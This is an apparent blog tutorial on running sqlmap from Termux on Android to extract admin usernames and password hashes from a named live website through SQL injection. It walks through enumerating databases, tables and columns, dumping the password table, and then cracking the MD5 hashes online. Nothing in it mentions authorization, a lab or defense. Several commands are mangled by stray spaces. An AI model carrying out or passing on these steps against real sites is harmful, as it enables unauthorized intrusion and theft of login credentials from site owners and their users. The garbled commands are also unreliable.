This tutorial we will share how to Get Username & Password with Sqlmap on Android. This method is as a reference for you who do not have a laptop / PC.
For learning media SQL. Okay go directly to the tutorial:
You directly download Termux on Android via Google Playstore. After the application is installed you follow the commands below. Type:
$ apt update -y && apt upgrade -y $ pkg install nano -y $ pkg install git -y $ pkg install python -y $ pkg install python2 -y
then you install the SQLmap. Type:
$ git clone https://github.com/sqlmapproject/sqlmap.git $ cd sqlmap $ python2 sqlmap.py
Here we select the target http://chinamost.com/en/news_detail.php?id=30 then type in the termux
$ python2 sqlmap.py -u http : //chinamost.com/en/news_detail.php? id = 30 --dbs
* This command is used to find any database that is on the website
SQLmap get 5 databases that are on the website. Then we will choose the cn_db database to get Tables information. Type:
$ python2 sqlmap.py -u http://chinamost.com/en/news_detail.php?id=30 --tables -D cn_db
* The above command is used to see the tables in the database generated by --dbs.
Here we get 5 tables in the cn_db database. Then to get your Username and Password information, usually in the Admin / Password / User / Login table namesand we will try to find columns for Password here. Type:
$ python2 sqlmap.py -u http://chinamost.com/en/news_detail.php?id=30 -D cn_db -T Password --columns
* The above command is used to view the database columns generated from --tables Password.
From the password tables there are 4 columns namely id, loginname, password and salt. This is the login information on the website. Okay to find out the information we will dump the columns. Type:
$ python2 sqlmap.py -u http://chinamost.com/en/news_detail.php?id=30 -D cn_db -T Password --dump
* The above command is used to retrieve the data base of the column password in the column column username & password
Okay here we managed to get the username and password login information on the website. The password we got is still in md5 format. If you find a password that has been encrypted you must crack the password. SQLmap actually provides to crack the password but in our opinion is not very good. You can crack the password through the online crack station on Google.
And here are the basic commands you can use in SQLmap:
python2 sqlmap.py -u http://webtarget.com - dbs
python2 sqlmap.py -u http: // webtarget.com -D NameBata--tables
python2 sqlmap.py -u http://webtarget.com -D nameDatabase -T NameTables --columns
python2 sqlmap.py -u http://webtarget.com -D nameDatabase -T NameTables -C NameColumns , the user - dump